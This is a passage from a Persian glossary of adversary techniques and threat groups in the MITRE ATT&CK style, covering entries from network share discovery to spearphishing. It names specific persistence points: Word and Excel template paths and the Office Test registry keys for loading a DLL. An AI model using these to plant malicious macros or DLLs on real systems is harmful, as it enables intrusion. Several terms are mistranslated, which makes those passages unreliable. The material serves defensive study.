دشمنان ممکن است سعی کنند فهرستی از خدماتی که روی میزبان‌های راه دور اجرا می‌شوند، از جمله سرویس‌هایی که ممکن است در برابر بهره برداری از نرم‌افزار از راه دور آسیب پذیر باشند، دریافت کنند. روش‌های به دست آوردن این اطلاعات شامل اسکن پورت و اسکن آسیب‌پذیری با استفاده از ابزارهایی است که روی یک سیستم آورده می‌شوند. در محیط‌های ابری، دشمنان ممکن است تلاش کنند سرویس‌هایی را که روی میزبان‌های ابر دیگر اجرا می‌شوند، کشف کنند. علاوه بر این، اگر محیط ابری به یک محیط داخلی متصل باشد، ممکن است دشمنان بتوانند خدماتی را که در سیستم‌های غیر ابری اجرا می‌شوند نیز شناسایی کنند.

کشف اشتراک شبکه

Network Share Discovery

دشمنان ممکن است به دنبال پوشه‌ها و درایوهای اشتراک‌گذاری شده در سیستم‌های راه دور به‌عنوان وسیله‌ای برای شناسایی منابع اطلاعاتی برای جمع‌آوری به عنوان پیش‌رو برای جمع‌آوری و شناسایی سیستم‌های بالقوه مورد علاقه برای حرکت جانبی باشند. شبکه‌ها اغلب حاوی درایوها و پوشه‌های شبکه مشترک هستند که کاربران را قادر می‌سازد به فهرست‌های فایل در سیستم‌های مختلف در سراسر شبکه دسترسی داشته باشند. اشتراک گذاری فایل از طریق شبکه ویندوز از طریق پروتکل SMB انجام می شود. Net را می توان برای پرس و جو از یک سیستم راه دور برای درایوهای مشترک موجود با استفاده از دستور net view \\remotesystem استفاده کرد. همچنین می توان از آن برای پرس و جو درایوهای مشترک در سیستم محلی با استفاده از اشتراک خالص استفاده کرد. برای macOS، دستور sharing -l تمام نقاط مشترک مورد استفاده برای سرویس‌های smb را فهرست می‌کند.

پروتکل لایه غیر کاربردی

Non-Application Layer Protocol

دشمنان ممکن است از یک پروتکل لایه غیر کاربردی برای ارتباط بین میزبان و سرور C2یا بین میزبان های آلوده در یک شبکه استفاده کنند. فهرست پروتکل های ممکن گسترده است. مثال‌های خاص شامل استفاده از پروتکل‌های لایه شبکه، مانند پروتکل پیام کنترل اینترنت (ICMP)، پروتکل‌های لایه انتقال، مانند پروتکل داده‌گرام کاربر (UDP)، پروتکل‌های لایه جلسه، مانند Socket Secure (SOCKS) و همچنین هدایت‌شده است. پروتکل های تونل شده / مانند سریال از طریقLAN (SOL) ارتباط ICMP بین میزبان ها یک مثال است. از آنجایی که ICMP بخشی از مجموعه پروتکل اینترنت است، باید توسط همه میزبان های سازگار با IP پیاده سازی شود. با این حال، به طور معمول مانند سایر پروتکل های اینترنتی مانند TCP یا UDP نظارت نمی شود و ممکن است توسط دشمنان برای پنهان کردن ارتباطات استفاده شود.

بندر غیر استاندارد

Non-Standard Port

دشمنان ممکن است با استفاده از یک پروتکل و تقسیم پورت که معمولاً مرتبط نیستند ارتباط برقرار کنند. به عنوان مثال، HTTPS بر روی پورت 8088 یا پورت 587 برخلاف پورت سنتی 443. دشمنان ممکن است تغییراتی در پورت استاندارد مورد استفاده توسط یک پروتکل برای دور زدن فیلتر کردن یا تجزیه و تحلیل/تجزیه داده های شبکه ایجاد کنند.

انکار سرویس شبکه

Network Denial of Service

دشمنان ممکن است حملات انکار خدمات شبکه را برای کاهش یا مسدود کردن دسترسی به منابع هدف برای کاربران انجام دهند. DoS شبکه را می توان با پایان دادن به خدمات پهنای باند شبکه که بر آن تکیه می کنند، انجام داد. منابع نمونه شامل وب سایت های خاص، خدمات ایمیل، DNS و برنامه های کاربردی مبتنی بر وب است. مشاهده شده است که دشمنان حملات DoS شبکه ای را برای اهداف سیاسی و برای حمایت از سایر فعالیت های مخرب، از جمله حواس پرتی، هکتیکیسم، و اخاذی انجام می دهند. هنگامی که ظرفیت پهنای باند اتصال شبکه به یک سیستم به دلیل حجم ترافیک مخرب هدایت شده به منبع یا اتصالات شبکه و دستگاه های شبکه ای که منبع به آنها تکیه می کند، DoS شبکه رخ می دهد. به عنوان مثال، یک دشمن ممکن است 10 گیگابیت در ثانیه ترافیک را به سروری ارسال کند که توسط شبکه ای با اتصال 1 گیگابیت بر ثانیه به اینترنت میزبانی می شود. این ترافیک می تواند توسط یک سیستم منفرد یا چندین سیستم پراکنده در سراسر اینترنت ایجاد شود که معمولاً به آن DoS توزیع شده ( DDoS) می گویند. برای انجام حملات شبکه DoS چندین جنبه برای چندین روش اعمال می شود، از جمله جعل آدرس IP و بات نت ها. دشمنان ممکن است از آدرس IP اصلی یک سیستم مهاجم استفاده کنند، یا آدرس IP منبع را جعل کنند تا ردیابی ترافیک حمله به سیستم مهاجم یا فعال کردن بازتاب را دشوارتر کنند. این می تواند با کاهش یا حذف اثربخشی فیلتر کردن توسط آدرس منبع در دستگاه های دفاعی شبکه، دشواری دفاع در برابر حمله را افزایش دهد. برای حملات DoS که مستقیماً سیستم میزبان را هدف قرار می دهند، به Endpoint Denial of Service مراجعه کنید.

گروه جاسوسی سایبری تحت حمایت دولت

Naikon

Naikon یک گروه جاسوسی سایبری تحت حمایت دولت است که به دفتر شناسایی فنی دوم منطقه نظامی چنگدو در ارتش آزادی بخش خلق چین مشخص کننده پوشش واحد نظامی78020 نسبت داده می شود. نایکون که حداقل از سال 2010 فعال است، عمدتاً علیه سازمان‌های دولتی، نظامی و مدنی در آسیای جنوب شرقی و همچنین علیه نهادهای بین‌المللی مانند برنامه توسعه سازمان ملل متحد و انجمن کشورهای جنوب شرق آسیا عملیات انجام داده است. در حالی که Naikon برخی از ویژگی‌های مشترک را با دارد، به نظر نمی‌رسد که این دو گروه دقیقاً مطابقت داشته باشند.

یک گروه فعالیت است

NEODYMIUM

NEODYMIUM یک گروه فعالیت است که در ماه می 2016 کمپینی را انجام داد و قربانیان ترک را به شدت هدف قرار داده است. این گروه به دلیل تداخل ویژگی های قربانی و مبارزات انتخاباتی، شباهت خود را به گروه فعالیت دیگری به نام PROMETHIUM نشان داده است. NEODYMIUM گزارش شده است که ارتباط نزدیکی با عملیات BlackOasis دارد، اما شواهدی مبنی بر اینکه نام گروه ها نام مستعار هستند شناسایی نشده است.

Night Dragon

Night Dragon یک نام کمپین برای فعالیت‌هایی است که شامل یک گروه تهدید می‌شود که عمدتاً در چین فعالیت‌هایی را انجام داده‌اند.

گروه تهدید جاسوسی سایبری روسی زبان

Nomadic Octopus

Nomadic Octopus یک گروه تهدید جاسوسی سایبری روسی زبان است که حداقل از سال 2014 عمدتاً آسیای مرکزی، از جمله دولت‌های محلی، نمایندگی های دیپلماتیک و افراد را هدف قرار داده است. اختاپوس Nomadic مشاهده شده است که کمپین‌هایی را شامل بدافزار اندروید و ویندوز انجام می‌دهد که عمدتاً از برنامه نویسی دلفی استفاده می کند. زبان، و ساخت انواع سفارشی.

حمله سرریز

Overflow Attack

سرریز بافر یا سرریز شدن بافر زمانی رخ می‌دهد که داده‌های بیشتری از یک بافر با طول ثابت در اختیار قرار گیرد. اطلاعات اضافی، که باید به جایی برسد، می‌تواند به فضای حافظه مجاور سرازیر شود و داده‌های موجود در آن فضا را خراب یا رونویسی کند.

به دست آوردن قابلیت‌ها

Obtain Capabilities

دشمنان ممکن است قابلیت‌هایی را بخرند و/ یا بدزدند که می‌توان از آنها در هنگام هدف‌گیری استفاده کرد. دشمنان به جای توسعه قابلیت‌های خود در داخل، ممکن است آنها را خریداری، دانلود کنند، یا سرقت کنند. فعالیت‌ها ممکن است شامل دستیابی به بدافزار، نرم‌افزار (از جمله مجوزها)، سوء استفاده‌ها، گواهی‌ها و اطلاعات مربوط به آسیب‌پذیری‌ها باشد. دشمنان ممکن است قابلیت‌هایی برای پشتیبانی از عملیات خود در طول مراحل متعدد چرخه حیات دشمن به دست آورند. علاوه بر دانلود بدافزار، نرم افزار و سوء استفاده رایگان از اینترنت، دشمنان ممکن است این قابلیت‌ها را از نهادهای شخص ثالث خریداری کنند. نهادهای شخص ثالث می‌توانند شامل شرکت‌های فناوری باشند که در بدافزارها و سوء استفاده‌ها، بازارهای جنایی یا افراد متخصص تخصص دارند. علاوه بر خرید قابلیت‌ها، دشمنان ممکن است قابلیت‌هایی را از نهادهای شخص ثالث (از جمله سایر دشمنان) سرقت کنند. این می‌تواند شامل سرقت مجوزهای نرم‌افزار، بدافزار، SSL/TLS و گواهی‌های امضای کد، یا حمله به پایگاه‌های داده بسته آسیب‌پذیری‌ها یا سوءاستفاده‌ها باشد.

به دست آوردن قابلیت ها: بدافزار

Obtain Capabilities: Malware

دشمنان ممکن است بدافزاری را خریداری، سرقت یا دانلود کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. نرم افزارهای مخرب می توانند شامل payloadها، droppers، ابزارهایpost-compromise، Backdoors، Packers و پروتکل های C2 باشند. دشمنان ممکن است بدافزاری را برای پشتیبانی از عملیات خود، به دست آوردن ابزاری برای حفظ کنترل ماشین های راه دور، فرار از دفاع و اجرای رفتارهای پس از سازش به دست آورند. علاوه بر دانلود بدافزار رایگان از اینترنت، دشمنان ممکن است این قابلیت ها را از نهادهای شخص ثالث خریداری کنند. نهادهای شخص ثالث می‌توانند شامل شرکت‌های فناوری متخصص در توسعه بدافزار، بازارهای جنایی شامل Malware-as-a-a-Service یا ( MaaS) یا افراد باشند. علاوه بر خرید بدافزار، دشمنان ممکن است بدافزار را از نهادهای شخص ثالث (از جمله سایر دشمنان) بدزدند و از آنها استفاده مجدد کنند.

به دست آوردن قابلیت ها: ابزار

Obtain Capabilities: Tool

دشمنان ممکن است ابزارهای نرم‌افزاری را بخرند، سرقت کنند یا دانلود کنند که می‌توان از آنها در هنگام هدف‌گیری استفاده کرد. ابزارها می توانند منبع باز یا بسته، رایگان یا تجاری باشند. یک ابزار می تواند برای اهداف مخرب توسط یک دشمن مورد استفاده قرار گیرد، اما (برخلاف بدافزار) قرار نبود برای آن اهداف استفاده شود مثلاً (PsExec)دستیابی به ابزار می‌تواند شامل تهیه مجوزهای نرم‌افزار تجاری، از جمله برای ابزارهای قرمز رنگ مانند Cobalt Strike باشد. نرم‌افزار تجاری ممکن است از طریق خرید، سرقت مجوزها (یا نسخه‌های مجاز نرم‌افزار)، یا کرک کردن نسخه‌های آزمایشی به دست آید. دشمنان ممکن است ابزارهایی را برای پشتیبانی از عملیات خود، از جمله برای حمایت از اجرای رفتارهای پس از سازش به دست آورند. علاوه بر دانلود رایگان یا خرید نرم‌افزار، دشمنان ممکن است نرم‌افزار و/یا مجوزهای نرم‌افزار را از نهادهای شخص ثالث (از جمله سایر دشمنان) سرقت کنند.

به دست آوردن قابلیت‌ها: گواهی امضای کد

Obtain Capabilities: Code Signing Certificates

دشمنان ممکن است گواهی‌های امضای کد را بخرند و یا بدزدند که می‌تواند در هنگام هدف‌گیری استفاده شود. امضای کد فرآیند امضای دیجیتالی فایل‌های اجرایی و اسکریپت‌ها برای تایید نویسنده نرم افزار و تضمین عدم تغییر یا خرابی کد است. امضای کد سطحی از اعتبار برنامه را از سوی توسعه دهنده و تضمین عدم دستکاری برنامه را فراهم می‌کند. کاربران و یا ابزارهای امنیتی ممکن است به یک کد امضا شده بیشتر از یک کد بدون امضا اعتماد کنند، حتی اگر ندانند چه کسی گواهی را صادر کرده یا نویسنده آن کیست. قبل از امضای کد، دشمنان ممکن است گواهی امضای کد را برای استفاده در عملیات خریداری یا سرقت کنند. خرید گواهی‌های امضای کد ممکن است با استفاده از یک سازمان جلویی یا با استفاده از اطلاعات به سرقت رفته از یک نهاد در معرض خطر قبلی انجام شود که به حریف اجازه می‌دهد تا به یک ارائه‌دهنده گواهی به عنوان آن موجودیت اعتبار سنجی کند. دشمنان همچنین ممکن است مواد امضای کد را مستقیماً از یک شخص ثالث در معرض خطر سرقت کنند.

به دست آوردن قابلیت‌ها: گواهی‌های دیجیتال

Obtain Capabilities: Digital Certificates

دشمنان ممکن است گواهی‌های SSL/TLS را خریداری و یا بدزدند که می‌توانند در هنگام هدف‌گیری استفاده شوند. گواهینامه‌های SSL/TLSبرای القای اعتماد طراحی شده‌اند. آنها شامل اطلاعاتی درباره کلید، اطلاعاتی درباره هویت مالک آن و امضای دیجیتالی نهادی است که صحت محتوای گواهی را تأیید کرده است. اگر امضا معتبر باشد و شخصی که گواهی را بررسی می‌کند به امضاکننده اعتماد کند، می‌داند که می‌تواند از آن کلید برای برقراری ارتباط با صاحب آن استفاده کند. دشمنان ممکن است گواهی‌های SSL/TLSرا برای پیشبرد عملیات خود خریداری یا سرقت کنند، مانند رمزگذاری ترافیک C2 (مثلاً رمزنگاری نامتقارن با پروتکل‌های وب) یا حتی فعال کردن Adversary-in-the-Middle در صورتی که گواهی مورد اعتماد باشد یا به شکل دیگری به ریشه آن اضافه شود. خرید گواهی‌های دیجیتال ممکن است با استفاده از یک سازمان جلویی یا با استفاده از اطلاعات به سرقت رفته از یک نهاد در معرض خطر قبلی انجام شود که به حریف اجازه می‌دهد تا به یک ارائه‌دهنده گواهی به عنوان آن نهاد اعتبار سنجی کند. دشمنان همچنین ممکن است مواد گواهی را مستقیماً از یک شخص ثالث در معرض خطر، از جمله از مقامات گواهی، سرقت کنند. دشمنان ممکن است دامنه‌هایی را که بعداً برای آن گواهی SSL/TLSخریداری می‌کنند، ثبت یا هک کنند.

به دست‌آوردن قابلیت‌ها: بهره برداری‌ها

Obtain Capabilities: Exploits

دشمنان ممکن است اکسپلویت‌هایی را بخرند، بدزدند یا دانلود کنند که می‌تواند در هنگام هدف‌گیری استفاده شود. یک اکسپلویت از یک باگ یا آسیب‌پذیری استفاده می‌کند تا باعث ایجاد رفتار ناخواسته یا پیش‌بینی نشده در سخت‌افزار یا نرم‌افزار رایانه شود. دشمن ممکن است به جای توسعه اکسپلویت‌های خود، اکسپلویت‌ها را از آنلاین بیابد/تغییر دهد یا آنها را از فروشندگان اکسپلویت خریداری کند. علاوه بر دانلود اکسپلویت‌های رایگان از اینترنت، دشمنان ممکن است اکسپلویت‌هایی را از نهادهای شخص ثالث خریداری کنند. نهادهای شخص ثالث می‌توانند شامل شرکت‌های فناوری که در توسعه بهره‌برداری، بازارهای جنایی (از جمله کیت‌های بهره‌برداری)، یا افراد متخصص هستند، باشد. علاوه بر خرید اکسپلویت‌ها، دشمنان ممکن است اکسپلویت‌ها را از اشخاص ثالث (از جمله سایر دشمنان) بدزدند و از آنها استفاده مجدد کنند. یک حریف ممکن است تالارهای گفتمان ارائه‌دهنده اکسپلویت را برای درک وضعیت اکسپلویت‌های موجود و همچنین کشف‌شده‌های جدید نظارت کند. معمولاً بین زمانی که یک اکسپلویت کشف می‌شود و زمانی که عمومی می‌شود تاخیر وجود دارد. یک حریف ممکن است سیستم‌های کسانی را هدف قرار دهد که به منظور به دست‌آوردن آن دانش برای استفاده در عملیات بعدی شناخته شده‌اند که تحقیقات و توسعه بهره برداری را انجام می‌دهند. دشمنان ممکن است از اکسپلویت‌ها در طول مراحل مختلف چرخه حیات دشمن استفاده کنند (یعنی بهره‌برداری از برنامه عمومی، بهره‌برداری برای اجرای مشتری، بهره برداری برای افزایش امتیاز، بهره برداری برای فرار دفاعی، بهره برداری برای دسترسی به اعتبار، بهره برداری از خدمات از راه دور و سیستم بهره برداری) .

به دست‌آوردن قابلیت‌ها: آسیب پذیری‌ها

Obtain Capabilities: Vulnerabilities

دشمنان ممکن است اطلاعاتی درباره آسیب‌پذیری‌هایی که می‌توانند در طول هدف‌گیری استفاده شوند، به دست آورند. آسیب‌پذیری یک ضعف در سخت‌افزار یا نرم‌افزار رایانه است که می‌تواند به‌طور بالقوه توسط دشمن مورد سوءاستفاده قرار گیرد تا رفتار ناخواسته یا پیش‌بینی‌نشده‌ای را ایجاد کند. دشمنان ممکن است اطلاعات آسیب‌پذیری را با جستجو در پایگاه‌های اطلاعاتی باز یا دسترسی به پایگاه‌های اطلاعاتی آسیب‌پذیری بسته پیدا کنند. یک دشمن ممکن است افشای آسیب‌پذیری‌ها/پایگاه‌های اطلاعاتی را برای درک وضعیت آسیب‌پذیری‌های موجود و همچنین آسیب‌پذیری‌های تازه کشف‌شده نظارت کند. معمولاً بین زمانی که یک آسیب‌پذیری کشف می‌شود و زمانی که عمومی می‌شود، تاخیر وجود دارد. یک دشمن ممکن است سیستم های کسانی را که برای انجام تحقیقات آسیب پذیری شناخته شده اند (از جمله فروشندگان تجاری) هدف قرار دهد. آگاهی از یک آسیب‌پذیری ممکن است باعث شود که حریف به دنبال یک اکسپلویت موجود (یعنی اکسپلویت‌ها) بگردد یا خودش برای توسعه آن (یعنی اکسپلویت‌ها) تلاش کند.

راه اندازی اپلیکیشن آفیس

Office Application Startup

دشمنان ممکن است از برنامه های مبتنی بر مایکروسافت آفیس برای تداوم بین راه اندازی ها استفاده کنند. مایکروسافت آفیس یک مجموعه کاربردی نسبتاً رایج در سیستم عامل های مبتنی بر ویندوز در یک شبکه سازمانی است. مکانیسم‌های متعددی وجود دارد که می‌توان با آفیس برای تداوم در هنگام راه‌اندازی یک برنامه مبتنی بر آفیس استفاده کرد. این می تواند شامل استفاده از ماکروها و افزونه های قالب آفیس باشد. ویژگی‌های مختلفی در Outlook کشف شده‌اند که می‌توان از آنها برای به دست آوردن ماندگاری سوء استفاده کرد، مانند قوانین Outlook، فرم‌ها و صفحه اصلی. این مکانیسم‌های ماندگاری می‌توانند در Outlook کار کنند یا از طریق Office 365 استفاده شوند.

راه اندازی برنامه آفیس: ماکروهای قالب آفیس

Office Application Startup: Office Template Macros

دشمنان ممکن است از الگوهای مایکروسافت آفیس برای به دست آوردن پایداری در یک سیستم در خطر سوء استفاده کنند. مایکروسافت آفیس شامل قالب هایی است که بخشی از برنامه های معمول آفیس هستند و برای سفارشی کردن سبک ها استفاده می شوند. هر بار که یک برنامه شروع می شود از قالب های پایه در برنامه استفاده می شود. ماکروهای Visual Basic for Applications (VBA)را می توان در قالب پایه قرار داد و برای اجرای کد هنگام شروع برنامه آفیس مربوطه به منظور به دست آوردن ماندگاری استفاده کرد. نمونه هایی برای Word و Excel کشف و منتشر شده است. به‌طور پیش‌فرض، Word یک الگوی Normal.dotm ایجاد کرده است که می‌توان آن را تغییر داد تا یک ماکرو مخرب را در خود جای دهد. اکسل به طور پیش فرض یک فایل الگو ندارد، اما می توان آن را اضافه کرد که به طور خودکار بارگیری می شود. الگوهای به اشتراک گذاشته شده نیز ممکن است ذخیره شده و از مکان های راه دور کشیده شوند. مکان :Word Normal.dotm C:\Users\<username>\AppData\Roaming\Microsoft\Templates\Normal.dotm مکان Excel Personal.xlsb: C:\Users\<username>\AppData\Roaming\Microsoft\Excel\XLSTART\PERSONAL.XLSB دشمنان همچنین ممکن است با ربودن دستور جستجوی برنامه، مکان الگوی پایه را تغییر دهند تا به الگوی خود اشاره کنند، به عنوان مثالWord2016 ابتدا Normal.dotm را در C:\Program Files (x86)\Microsoft Office\root\Office16\ یا با تغییر کلید رجیستری GlobalDotName جستجو می کند. با تغییر کلید رجیستری GlobalDotName، حریف می‌تواند یک مکان دلخواه، نام فایل و پسوند فایل را برای استفاده برای قالبی که در راه‌اندازی برنامه بارگذاری می‌شود، مشخص کند. برای سوء استفاده از GlobalDotName، ممکن است دشمنان ابتدا نیاز داشته باشند که الگو را به عنوان یک سند قابل اعتماد ثبت کنند یا آن را در یک مکان مطمئن قرار دهند. ممکن است یک دشمن بسته به سیاست امنیتی سیستم یا سازمانی در استفاده از ماکروها، ماکروها را فعال کند تا بدون محدودیت اجرا شوند.

راه اندازی برنامه آفیس: تست آفیس

Office Application Startup: Office Test

دشمنان ممکن است از کلید رجیستری"Office Test" مایکروسافت آفیس برای به دست آوردن پایداری در یک سیستم در خطر سوء استفاده کنند. یک مکان رجیستری تست آفیس وجود دارد که به کاربر اجازه می دهد یک DLL دلخواه را مشخص کند که هر بار که برنامه آفیس شروع می شود اجرا می شود. تصور می شود که این کلید رجیستری توسط مایکروسافت برای بارگیری DLL ها برای اهداف آزمایش و اشکال زدایی در حین توسعه برنامه های آفیس استفاده می شود. این کلید رجیستری به‌طور پیش‌فرض در طول نصب آفیس ایجاد نمی‌شود. کلیدهای کاربر و رجیستری جهانی برای ویژگی Office Test وجود دارد: HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf دشمنان ممکن است این کلید رجیستری را اضافه کنند و یک DLL مخرب را مشخص کنند که هر زمان که یک برنامه آفیس مانند Word یا Excel شروع می شود، اجرا می شود.

راه اندازی برنامه آفیس: فرم های چشم انداز

Office Application Startup: Outlook Forms

دشمنان ممکن است از فرم‌های Microsoft Outlook برای به دست آوردن پایداری در یک سیستم آسیب‌دیده سوء استفاده کنند. فرم های Outlook به عنوان الگوهایی برای ارائه و عملکرد در پیام های Outlook استفاده می شوند. فرم‌های سفارشی Outlook را می‌توان ایجاد کرد که زمانی که یک ایمیل ساخته‌شده خاص توسط دشمن با استفاده از همان فرم سفارشی Outlook ارسال می‌شود، کد را اجرا می‌کنند. هنگامی که فرم های مخرب به صندوق پستی کاربر اضافه شد، هنگام راه اندازی Outlook بارگیری می شوند. هنگامی که دشمن یک ایمیل ساخته شده خاص برای کاربر ارسال می کند، فرم های مخرب اجرا می شوند.

راه اندازی برنامه آفیس: صفحه اصلی Outlook

Office Application Startup: Outlook Home Page

دشمنان ممکن است از ویژگی صفحه اصلی Microsoft Outlook برای به دست آوردن پایداری در یک سیستم در خطر سوء استفاده کنند. صفحه اصلی Outlook یک ویژگی قدیمی است که برای سفارشی کردن ارائه پوشه‌های Outlook استفاده می شود. این ویژگی به شما اجازه می دهد تا هر زمان که یک پوشه باز می شود، یک URL داخلی یا خارجی بارگیری و ارائه شود. می توان یک صفحه HTML مخرب ایجاد کرد که در صورت بارگیری توسط صفحه اصلی Outlook، کد را اجرا می کند.هنگامی که صفحات اصلی مخرب به صندوق پستی کاربر اضافه شد، با راه اندازی Outlook بارگیری می شوند. صفحات اصلی مخرب زمانی اجرا می شوند که پوشه Outlook مناسب بارگیری مجدد شود.

راه اندازی برنامه آفیس: افزونه ها

Office Application Startup: Add-ins

دشمنان ممکن است از افزونه های مایکروسافت آفیس برای به دست آوردن پایداری در یک سیستم آسیب دیده سوء استفاده کنند. از افزونه های آفیس می توان برای افزودن قابلیت به برنامه های آفیس استفاده کرد. انواع مختلفی از افزونه ها وجود دارد که می توانند توسط محصولات مختلف Office استفاده شوند. شامل افزونه‌های Word/Excel (WLL/XLL)، افزودنی‌های VBA، افزونه‌هایOffice Component Object Model (COM)، افزونه‌های اتوماسیون، ویرایشگر VBA (VBE)، ابزارهای ویژوال استودیو برای آفیس (VSTO) -ins و افزونه های Outlook . از افزونه ها می توان برای به دست آوردن ماندگاری استفاده کرد زیرا می توان آنها را طوری تنظیم کرد که هنگام شروع یک برنامه آفیس کد را اجرا کنند.

فایل ها یا اطلاعات مبهم

Obfuscated Files or Information

دشمنان ممکن است تلاش کنند تا کشف یا تجزیه و تحلیل یک فایل اجرایی یا فایل را با رمزگذاری، رمزگذاری، یا مخفی کردن محتوای آن در سیستم یا در حین انتقال، دشوار کنند. این یک رفتار رایج است که می تواند در پلتفرم های مختلف و شبکه برای فرار از دفاع استفاده شود. محموله‌ها ممکن است فشرده، بایگانی یا رمزگذاری شوند تا از شناسایی جلوگیری شود. این محموله‌ها ممکن است در حین دسترسی اولیه یا بعداً برای کاهش تشخیص استفاده شوند. گاهی اوقات ممکن است اقدام کاربر برای باز کردن و Deobfuscate/Decode کردن فایل ها یا اطلاعات برای اجرای کاربر مورد نیاز باشد. همچنین ممکن است از کاربر خواسته شود که یک رمز عبور برای باز کردن یک فایل فشرده/رمزگذاری شده محافظت شده با رمز عبور که توسط دشمن ارائه شده است وارد کند. دشمنان همچنین ممکن است از اسکریپت های فشرده یا آرشیو شده مانند جاوا اسکریپت استفاده کنند. بخش‌هایی از فایل‌ها را نیز می‌توان برای پنهان کردن رشته‌های متن ساده کدگذاری کرد که در غیر این صورت به مدافعان در کشف کمک می‌کرد. محموله‌ها همچنین ممکن است به فایل‌های مجزا و به ظاهر خوش‌خیم تقسیم شوند که تنها در صورت مونتاژ مجدد، عملکردهای مخرب را آشکار می‌کنند. دشمنان همچنین ممکن است دستورات اجرا شده از محموله ها یا مستقیماً از طریق یک مترجم دستور و اسکریپت را مبهم کنند. متغیرهای محیطی، نام مستعار، کاراکترها، و دیگر معنایی خاص پلتفرم/زبان را می توان برای فرار از تشخیص مبتنی بر امضا و مکانیسم های کنترل برنامه استفاده کرد.

تخلیه اعتبار سیستم عامل

OS Credential Dumping

دشمنان ممکن است سعی کنند اعتبارنامه ها را برای به دست آوردن اطلاعات ورود به حساب کاربری و اطلاعات اعتبار، معمولاً به شکل هش یا رمز عبور متنی واضح، از سیستم عامل و نرم افزار حذف کنند. سپس می توان از اعتبارنامه ها برای انجام حرکت جانبی و دسترسی به اطلاعات محدود استفاده کرد. تعدادی از ابزارهای ذکر شده در تکنیک‌های فرعی مرتبط ممکن است هم توسط دشمنان و هم توسط آزمایش‌کنندگان حرفه‌ای امنیت استفاده شود. ابزارهای سفارشی اضافی نیز احتمالا وجود دارد.

گروه تهدید ایرانی

OilRig

OilRig یک گروه تهدید ایرانی مشکوک است که حداقل از سال 2014 قربانیان خاورمیانه و بین المللی را هدف قرار داده است. این گروه بخش های مختلفی از جمله مالی، دولتی، انرژی، شیمیایی و مخابرات را هدف قرار داده است. به نظر می رسد این گروه حملات زنجیره تامین را انجام می دهد و از رابطه اعتماد بین سازمان ها برای حمله به اهداف اصلی خود استفاده می کند. FireEye ارزیابی می‌کند که این گروه از طرف دولت ایران بر اساس جزئیات زیرساختی که حاوی ارجاع به ایران، استفاده از زیرساخت‌های ایران و هدف‌گیری مطابق با منافع دولت-ملت است، کار می‌کند.

عملیات Wocao

Operation Wocao

عملیات Wocao فعالیت های انجام شده توسط یک دشمن جاسوسی سایبری مستقر در چین را شرح داد. عملیات Wocao نهادهای داخل دولت، ارائه دهندگان خدمات مدیریت شده، انرژی، مراقبت های بهداشتی و بخش های فناوری را در چندین کشور از جمله چین، فرانسه، آلمان، بریتانیا و ایالات متحده هدف قرار داد. عملیات Wocao از TTPها و ابزارهای مشابه APT20 استفاده کرد که نشان دهنده همپوشانی احتمالی است.

گروهی جاسوسی

Orangeworm

Orangeworm گروهی است که حداقل از سال 2015 سازمان‌هایی را در بخش مراقبت‌های بهداشتی در ایالات متحده، اروپا و آسیا به منظور جاسوسی شرکتی هدف قرار داده است.

فیشینگ

Phishing

ممکن است دشمنان برای دسترسی به سیستم های قربانی پیام های فیشینگ ارسال کنند. تمام اشکال فیشینگ به صورت الکترونیکی مهندسی اجتماعی ارائه می‌شود. فیشینگ را می‌توان هدف قرار داد که به عنوان spearphishing شناخته می شود. در spearphishing، یک فرد، شرکت یا صنعت خاص مورد هدف دشمن قرار می گیرد. به طور کلی‌تر، دشمنان می‌توانند فیشینگ غیرهدفمندی را انجام دهند، مانند کمپین‌های هرزنامه انبوه بدافزار. دشمنان ممکن است ایمیل‌هایی حاوی پیوست‌ها یا پیوندهای مخرب به قربانیان ارسال کنند، معمولاً برای اجرای کدهای مخرب در سیستم‌های قربانی. فیشینگ همچنین ممکن است از طریق خدمات شخص ثالث، مانند پلتفرم های رسانه های اجتماعی، انجام شود. فیشینگ همچنین ممکن است شامل تکنیک‌های مهندسی اجتماعی، مانند ظاهر شدن به عنوان یک منبع قابل اعتماد باشد.

فیشینگ: ضمیمه Spearphishing

Phishing: Spearphishing Attachment

دشمنان ممکن است ایمیل‌های spearphishing را با یک پیوست مخرب ارسال کنند تا به سیستم‌های قربانی دسترسی پیدا کنند. ضمیمهSpearphishing یک نوع خاص از spearphishing است. ضمیمه Spearphishing با سایر اشکال spearphishing متفاوت است، زیرا از بدافزار متصل به ایمیل استفاده می‌کند. تمام اشکال spearphishing به صورت الکترونیکی مهندسی اجتماعی ارائه می‌شود که هدف آن یک فرد، شرکت یا صنعت خاص است. در این سناریو، دشمنان یک فایل را به ایمیل spearphishing ضمیمه می‌کنند و معمولاً برای اجرا بر روی User Execution تکیه می‌کنند. Spearphishing همچنین ممکن است شامل تکنیک های مهندسی اجتماعی، مانند خودنمایی به عنوان یک منبع قابل اعتماد باشد. گزینه‌های زیادی برای پیوست مانند اسناد مایکروسافت آفیس، فایل های اجرایی، PDF یا فایل های آرشیو شده وجود دارد. پس از باز کردن پیوست (و به طور بالقوه کلیک کردن بر روی حفاظت های گذشته)، محموله دشمن از یک آسیب پذیری سوء استفاده می کند یا مستقیماً در سیستم کاربر اجرا می شود. متن ایمیل spearphishing معمولاً سعی می‌کند دلیل قابل قبولی برای باز کردن فایل ارائه دهد و ممکن است توضیح دهد که چگونه می‌توان از حفاظت‌های سیستم برای انجام این کار دور زد. این ایمیل همچنین ممکن است حاوی دستورالعمل هایی در مورد نحوه رمزگشایی یک پیوست، مانند رمز عبور فایل فشرده، به منظور فرار از دفاع مرزی ایمیل باشد. دشمنان اغلب پسوندها و نمادهای فایل را دستکاری می‌کنند تا فایل‌های اجرایی پیوست شده را فایل‌های سند به نظر برسانند، یا فایل‌هایی که از یک برنامه سوءاستفاده می‌کنند، فایلی برای برنامه دیگری به نظر می‌رسند.

فیشینگ: پیوند Spearphishing

Phishing: Spearphishing Link

